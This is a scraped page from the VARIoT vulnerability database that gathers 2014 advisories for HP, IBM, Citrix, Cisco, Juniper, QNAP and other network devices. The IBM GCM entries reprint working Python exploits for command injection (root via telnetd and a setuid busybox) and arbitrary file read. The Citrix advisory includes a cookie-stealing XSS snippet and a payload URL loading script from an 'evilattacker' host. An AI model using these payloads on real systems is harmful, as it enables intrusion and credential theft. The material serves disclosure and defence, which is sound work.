VARIoT IoT vulnerabilities database

Unspecified vulnerability in HP StoreVirtual 4000 Storage and StoreVirtual VSA 9.5 through 11.0 allows remote authenticated users to gain privileges via unknown vectors. Both the HP StoreVirtual 4000 Storage and the StoreVirtual VSA are storage devices for virtualized environments from Hewlett Packard (HP). The StoreVirtual 4000 Storage is a scale-out storage platform based on the LeftHand operating system. The StoreVirtual VSA is a set of software-defined virtual storage devices. A security vulnerability exists in the HP StoreVirtual 4000 Storage and StoreVirtual VSA versions 9.5 through 11.0. Successful exploits may compromise affected computers. Note: Technical details are currently unavailable. We will update this BID as soon as more information becomes available. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04281279 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04281279 Version: 1 HPSBST03039 rev.1 - HP StoreVirtual 4000 Storage and StoreVirtual VSA, Remote Disclosure of Information, Elevation of Privilege NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-07-14 Last Updated: 2014-07-14 Potential Security Impact: Remote disclosure of information, elevation of privilege Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP StoreVirtual 4000 Storage and StoreVirtual VSA. The vulnerabilities could be exploited remotely resulting in disclosure of information. References: CVE-2014-2605 - Remote Disclosure of Information CVE-2014-2606 - Elevation of Privilege SSRT101457 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. RESOLUTION HP has made the following software update and mitigation information available to resolve the vulnerabilities. HP recommends the following steps from the HP StoreVirtual 4000 Storage: Network design considerations and best practices documentation to mitigate the risk of CVE-2014-2605: the StoreVirtual iSCSI traffic and management traffic should not reside on the same network the management traffic should remain on the customers local network the management traffic should be isolated from external network traffic Reference: HP StoreVirtual 4000 Storage: Network design considerations and best practices http://h20195.www2.hp.com/v2/GetPDF.aspx/4AA2-5615ENW.pdf HISTORY Version:1 (rev.1) - 14 July 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlPED1wACgkQ4B86/C0qfVlQQQCgg9Ua7My5XNzQtzYNBvc8pLbY 4sMAoLnkaARplUynZNpDPJaGamivrXyY =DVTJ -----END PGP SIGNATURE-----

Unspecified vulnerability in HP StoreVirtual 4000 Storage and StoreVirtual VSA 9.5 through 11.0 allows remote attackers to obtain sensitive information via unknown vectors. Both the HP StoreVirtual 4000 Storage and the StoreVirtual VSA are storage devices for virtualized environments from Hewlett Packard (HP). The StoreVirtual 4000 Storage is a scale-out storage platform based on the LeftHand operating system. The StoreVirtual VSA is a set of software-defined virtual storage devices. A security vulnerability exists in the HP StoreVirtual 4000 Storage and StoreVirtual VSA versions 9.5 through 11.0. Note: Technical details are currently unavailable. We will update this BID as soon as more information becomes available. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04281279 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04281279 Version: 1 HPSBST03039 rev.1 - HP StoreVirtual 4000 Storage and StoreVirtual VSA, Remote Disclosure of Information, Elevation of Privilege NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-07-14 Last Updated: 2014-07-14 Potential Security Impact: Remote disclosure of information, elevation of privilege Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP StoreVirtual 4000 Storage and StoreVirtual VSA. References: CVE-2014-2605 - Remote Disclosure of Information CVE-2014-2606 - Elevation of Privilege SSRT101457 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. RESOLUTION HP has made the following software update and mitigation information available to resolve the vulnerabilities. HP recommends the following steps from the HP StoreVirtual 4000 Storage: Network design considerations and best practices documentation to mitigate the risk of CVE-2014-2605: the StoreVirtual iSCSI traffic and management traffic should not reside on the same network the management traffic should remain on the customers local network the management traffic should be isolated from external network traffic Reference: HP StoreVirtual 4000 Storage: Network design considerations and best practices http://h20195.www2.hp.com/v2/GetPDF.aspx/4AA2-5615ENW.pdf HISTORY Version:1 (rev.1) - 14 July 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlPED1wACgkQ4B86/C0qfVlQQQCgg9Ua7My5XNzQtzYNBvc8pLbY 4sMAoLnkaARplUynZNpDPJaGamivrXyY =DVTJ -----END PGP SIGNATURE-----

Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The following versions are vulnerable: IBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior IBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. The vulnerability stems from insufficient filtering of the 'query' string in the kvm.cgi file and insufficient filtering of the 'key' parameter in the avctalert.php script . *Product description* The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability: #!/usr/bin/python""" Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl import os sessid = "1111111111" target = "192.168.0.10" durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: print "[*] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[*] Done" print "[*] Trying telnet..." print "[*] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target) *2. Arbitrary file read * CVEID: CVE-2014-3081 Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target. PoC of this vulnerability: #!/usr/bin/python """ This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat" durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() print content.replace("<td>","").replace("</td>","") *3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E *Vendor Response:* IBM release 1.20.20.23447 firmware *Timeline:* 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed *External Information:* Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com

prodtest.php on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allows remote authenticated users to read arbitrary files via the filename parameter. An attacker can exploit this issue to read an arbitrary files in the context of the user running the application. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. *Product description* The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability: #!/usr/bin/python""" Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl import os sessid = "1111111111" target = "192.168.0.10" durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: print "[*] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[*] Done" print "[*] Trying telnet..." print "[*] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target) *2. Files can be anywhere on the target. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat" durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() print content.replace("<td>","").replace("</td>","") *3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E *Vendor Response:* IBM release 1.20.20.23447 firmware *Timeline:* 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed *External Information:* Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com

Cross-site scripting (XSS) vulnerability in administration user interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) 10.1 before 10.1-126.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Citrix NetScaler Application Delivery Controller 10.x prior 10.1-126.12 and 9.x prior 9.3-62.4 are vulnerable. Note: Citrix NetScaler Gateway is formerly known as Citrix Access Gateway Enterprise Edition. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20140716-2 > ======================================================================= title: Multiple vulnerabilities product: Citrix NetScaler Application Delivery Controller Citrix NetScaler Gateway vulnerable version: <9.3-62.4 <10.1-126.12 fixed version: >=9.3-62.4 >=10.1-126.12 CVE: CVE-2014-4346, CVE-2014-4347 impact: High homepage: http://www.citrix.com found: 2014-01-05 by: Stefan Viehb\xf6ck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: - ----------------------------- "Citrix NetScaler helps organizations build enterprise cloud networks that embody the characteristics and capabilities that define public cloud services, such as elasticity, expandability and simplicity. NetScaler brings to enterprise IT leaders multiple advanced technologies that were previously available only to large public cloud providers." "As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services. They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection. Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform." URL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html Business recommendation: - ------------------------ Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure to execute administrative actions. Affected Systems should be updated as soon as possible. Vulnerability overview/description: - ----------------------------------- 1) Cookie disclosure The error handler in the Apache g_soap module prints all of the request header information including the HTTP Cookie field. This vulnerability can be used in XSS attacks to gain access to the otherwise well protected (HttpOnly) "SESSID" cookie of an administrator. 2) Reflected Cross-Site Scripting (XSS) Citrix Netscaler suffers from multiple reflected Cross-Site Scripting vulnerabilities, which allow an attacker to steal user information, impersonate users and perform administrative actions on the appliance. There are many parameters which are not properly sanitized and thus vulnerable to XSS. Proof of concept: - ----------------- 1) Cookie disclosure A GET request to the SOAP handler returns the following information: GET /soap HTTP/1.1 Host: <host> *OTHER HEADER FIELDS* Response: HTTP/1.1 200 OK ... Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> ... <BODY> <H1>mod_gsoap Apache SOAP Server Error</H1> <p><strong>No body received</strong> ... <br>Cookie: SESSID=*SESSION ID*; ... In combination with an XSS vulnerability (see 2) an attacker can use the following code to extract cookies including the SESSID cookie of an administrator: var request = new XMLHttpRequest(); request.open('GET', '/soap', false); request.send(); lines=request.responseText.split('<br>') for (var i in lines){ if (lines[i].indexOf('Cookie')==0){ alert(lines[i]); break; } } 2) Reflected Cross-Site Scripting Accessing the following URL will include the Javascript code from http://evilattacker/evil.js: http://<host>/menu/topn?name=";<%2fscript><script+src%3d"http:%2f%2fevilattacker%2fevil.js"><%2fscript> Other pages do not sanitize user input properly as well: http://<host>/pcidss/launch_report?type=AA";alert('xss');x=" http://<host>/menu/guiw?nsbrand=AA<"'>AA&protocol=BB<"'>BB&id=CC<"'>CC Note: Content-Type is application/x-java-jnlp-file, so the injected script code is not interpreted. However, it is possible to inject arguments into a Java JNLP file, which might be used in further attacks. Vulnerable / tested versions: - ----------------------------- The vulnerabilities have been verified to exist in Citrix NetScaler VPX 10.0, which was the most recent version at the time of discovery. According to the vendor versions before 10.1-126.12 and 9.3-62.4 are vulnerable Vendor contact timeline: - ------------------------ 2014-01-09: Sending advisory and proof of concept exploit via encrypted channel. 2014-01-17: Vendor acknowledges receipt of advisory. 2014-04-04: Requesting status update. 2014-06-10: Vendor is "in the process of scheduling the release of a security bulletin". 2014-07-07: Requesting list of affected/non-affected versions CVE-IDs. 2014-07-07: Vendors is "still in the final stages of releasing the bulletin". 2014-07-07: Requesting info about cause of delay. 2014-07-07: Vendor is "still hopeful that the bulletin will be available soon". 2014-07-14: Vendor states that fixed version will be available on July 15/16. 2014-07-16: SEC Consult releases coordinated security advisory. Solution: - --------- Update to a more recent version of Citrix NetScaler. More information can be found at: https://support.citrix.com/article/ctx140863 Workaround: - ----------- No workaround available. Advisory URL: - ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested in working with the experts of SEC Consult? Write to career@sec-consult.com EOF Stefan Viehb\xf6ck / @2014 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQEcBAEBAgAGBQJTxmWgAAoJECyFJyAEdlkKWLYH/0wpELCJemzmkj2HaotFZJtt 4C4/hsHWGbxmi2VbeiwGvYKHtDsw2KBDWlTrVTef3UrBnbAv6jFncTCjOv3eU6Ze 9swUmwxzNB9zqGvhYwEpcO8tSQu0H3xDMvbpKqYvq2qaBSm4YmJyUrDlwwSkCUnq ycGqzfidkAXoMUu/6wdam5251zXcR33n1KRfr3AH65p/OoOXrvasgY395Cty9zqW yfBvEIEs845aE/gbjbp40qvroz1dG8Z2LP4ykFWywVme0imgSD6nv/33Z0tDmlcD f7JjK8F7R7Q8l4J54n0iclXCWZhoS3pfabd60NXMzMmxroMuksmiNycm7yLGfe4= =KicK -----END PGP SIGNATURE-----

Datum Systems SnIP on PSM-500 and PSM-4500 devices does not require authentication for FTP sessions, which allows remote attackers to obtain sensitive information via RETR commands. Datum Systems PSM-4500 and PSM-500 series satellite modem devices contain multiple vulnerabilities. Supplementary information : CWE Vulnerability type by CWE-220: Sensitive Data Under FTP Root (FTP Root Important data under ) Has been identified. http://cwe.mitre.org/data/definitions/220.htmlBy a third party RETR Important information may be obtained through commands. Successful exploits will allow attackers to gain unauthorized access to sensitive areas of the file system, which may aid in further attacks

QNAP TS-469U with firmware 4.0.7 Build 20140410, TS-459U, TS-EC1679U-RP, and SS-839 use world-readable permissions for /etc/config/shadow, which allows local users to obtain usernames and hashed passwords by reading the password. QNAP Systems QNAP TS-469U Turbo NAS is a NAS storage server from QNAP Systems. An insecure file permission vulnerability exists in QNAP Systems QNAP TS-469U Turbo NAS. A local attacker could use this vulnerability to gain permissions to a globally readable file and extract sensitive information from it. There are security vulnerabilities in QNAP TS-469U Turbo NAS running 4.0.7 Build 20140410 firmware, other versions may also be affected. Information obtained may aid in other attacks. read permission

The WebVPN CIFS implementation in Cisco Adaptive Security Appliance (ASA) Software 9.0(.4.1) and earlier allows remote CIFS servers to cause a denial of service (device reload) via a long share list, aka Bug ID CSCuj83344. Attackers can exploit this issue to cause an affected system to reload, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCuj83344

Directory traversal vulnerability in the Real-Time Monitoring Tool (RTMT) in Cisco Unified Communications Manager (CM) 10.0(1) allows remote authenticated users to read arbitrary files via a crafted URL, aka Bug ID CSCup57676. Exploiting this issue may allow an attacker to upload arbitrary files to arbitrary locations that could aid in further attacks. This issue is being tracked by Cisco Bug ID CSCup57676. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution

The Samsung Galaxy phone is a mobile phone developed by Samsung. The factory reset feature of the Samsung Galaxy 1 and 2 phones is vulnerable, allowing attackers to use the vulnerability to reset the factory settings and collect sensitive information such as user images and application data.

Datum Systems SnIP on PSM-500 and PSM-4500 devices has a hardcoded password of admin for the admin account, which makes it easier for remote attackers to obtain access via unspecified vectors. Datum Systems PSM-4500 and PSM-500 series satellite modem devices contain multiple vulnerabilities. Supplementary information : CWE Vulnerability type by CWE-798: Use of Hard-coded Credentials ( Using hard-coded credentials ) Has been identified. http://cwe.mitre.org/data/definitions/798.htmlAccess may be obtained by a third party. There is an undisclosed admin user account and admin password in the system. This vulnerability can be exploited by attackers to bypass the authentication mechanism and obtain Authorized access. This may aid in further attacks

Cross-site scripting (XSS) vulnerability in SRX Web Authentication (webauth) in Juniper Junos 11.4 before 11.4R11, 12.1X44 before 12.1X44-D34, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, and 12.1X47 before 12.1X47-D10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Juniper Junos is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Juniper Junos is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK. The following versions are affected: Juniper Junos 11.4 prior to 11.4R11, 12.1X44 prior to 12.1X44-D34, 12.1X45 prior to 12.1X45-D25, 12.1X46 prior to 12.1X46-D20, 12.1X47-D10 prior 12.1X47 version

Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet. Juniper Junos is prone to a remote denial-of-service vulnerability. Juniper Junos is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK. The following versions are affected: Juniper Junos 11.4 prior to 11.4R12, 12.1 prior to 12.1R10, 12.1X44 prior to 12.1X44-D35, 12.1X45 prior to 12.1X45-D25, 12.1X46 prior to 12.1X46-D20 , 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, 14.1R1 Version 14.1

Juniper Junos 12.1X46 before 12.1X46-D20 and 12.1X47 before 12.1X47-D10 on SRX Series devices allows remote attackers to cause a denial of service (flowd crash) via a crafted SIP packet. Juniper Junos is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected device to crash, denying service to legitimate users. Juniper Networks Junos on SRX Series devices is a set of network operating systems of Juniper Networks (Juniper Networks) running on SRX series service gateway devices. The operating system provides a secure programming interface and Junos SDK. A security vulnerability exists in Juniper Networks Juniper Junos 12.1X46 prior to 12.1X46-D20 and 12.1X47 prior to 12.1X47-D10 on SRX Series devices

Juniper Junos 11.4 before 11.4R12, 12.1X44 before 12.1X44-D32, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, and 12.1X47 before 12.1X47-D10 on SRX Series devices, when NAT protocol translation from IPv4 to IPv6 is enabled, allows remote attackers to cause a denial of service (flowd hang or crash) via a crafted packet. Juniper Junos is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected device to crash, denying service to legitimate users. Note: This issue affects on SRX series devices. Juniper Networks Junos on SRX Series devices is a set of network operating systems of Juniper Networks (Juniper Networks) running on SRX series service gateway devices. The operating system provides a secure programming interface and Junos SDK. The following versions are affected: Juniper Junos 11.4 prior to 11.4R12, 12.1X44 prior to 12.1X44-D32, 12.1X45 prior to 12.1X45-D25, 12.1X46 prior to 12.1X46-D20, 12.1X47-D10 prior 12.1X47 version

The web interface in Schrack Technik microControl with firmware before 1.7.0 (937) has a hardcoded password of not for the "user" account, which makes it easier for remote attackers to obtain access via unspecified vectors. Schrack Emergency Lights System is a set of emergency lighting system of Austria Schrack company. The system includes self-contained emergency luminaires, low power systems (LPS), and more. Schrack Emergency Lights System versions prior to 1.7.0 (937) have the following security vulnerabilities: 1. Insecure default password vulnerability 2. Authentication bypass vulnerability 3. HTML injection vulnerability 4. Information disclosure vulnerability. Attackers can use these vulnerabilities to bypass authentication mechanisms, perform unauthorized operations, obtain sensitive information, and execute arbitrary script code in the context of affected browsers. Steal cookie-based authentication. Multiple HTML-injection vulnerabilities 4. Schrack Technik microControl is a distributed power supply system (low power consumption system) of Schrack Technik Company in Austria. A remote attacker could exploit this vulnerability to gain access

Cisco Adaptive Security Appliance (ASA) Software 8.4(.6) and earlier, when using an unsupported configuration with overlapping criteria for filtering and inspection, allows remote attackers to cause a denial of service (traffic loop and device crash) via a packet that triggers multiple matches, aka Bug ID CSCui45606. An attacker can exploit this issue to cause the affected device to crash, denying service to legitimate users. This issue is tracked by Cisco Bug ID CSCui45606

The File Transfer feature in WebEx Meetings Client in Cisco WebEx Meetings Server and WebEx Meeting Center does not verify that a requested file was an offered file, which allows remote attackers to read arbitrary files via a modified request, aka Bug IDs CSCup62442 and CSCup58463. Vendors have confirmed this vulnerability Bug ID CSCup62442 and CSCup58463 It is released as.A third party may be able to read any file via a modified request. Cisco WebEx Meetings is a networked online conferencing product in Cisco's WebEx conferencing solution. A remote attacker can read arbitrary files with a modified request. Cisco WebEx Meetings Client is prone to an arbitrary-file-download vulnerability. An attacker can exploit this issue to download arbitrary files from the Web server and obtain potentially sensitive information. This issue is being tracked by Cisco bug IDs CSCup62442 and CSCup58463

Heap-based buffer overflow in the file-sharing feature in WebEx Meetings Client in Cisco WebEx Meetings Server and WebEx Meeting Center allows remote attackers to execute arbitrary code via crafted data, aka Bug IDs CSCup62463 and CSCup58467. This vulnerability Bug ID CSCup62463 and CSCup58467 It is released as.A third party could execute arbitrary code through crafted data. Allow remote attackers to exploit exploits to execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. This issue is being tracked by Cisco bug IDs CSCup62463 and CSCup58467

